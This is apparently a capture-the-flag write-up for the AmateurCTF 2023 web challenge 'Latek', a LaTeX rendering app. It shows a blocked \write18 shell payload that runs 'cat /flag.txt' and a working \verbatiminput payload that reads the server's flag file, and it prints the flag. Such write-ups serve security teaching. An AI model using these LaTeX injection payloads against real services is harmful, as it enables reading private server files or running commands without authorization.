Published on

AmateurCTF '23 - Web - Latek

Authors

Challenge Description

bryanguo (not associated with the ctf), keeps saying it's pronouced latek not latex like the glove material. anyways i made this simple app so he stops paying for overleaf.

Note: flag is ONLY at /flag.txt

Author: smashmaster

Connection info: latek.amt.rs

Solution

Visting the website, we're greeted with the following

chal

We can see, that the code is using pdftex to render the latex. Let's try to read the flag using the following payload

\documentclass{article}
\begin{document}
\immediate\write18{cat /flag.txt}
\end{document}
chal

Well, we can see that \write18 is blocked. I tried searching for different ways on hacktricks and the following payload worked

\documentclass{article}
\usepackage{verbatim}
\begin{document}
\verbatiminput{/flag.txt}
\end{document}
chal

Flag: amateursCTF{th3_l0w_budg3t_and_n0_1nstanc3ing_caus3d_us_t0_n0t_all0w_rc3_sadly}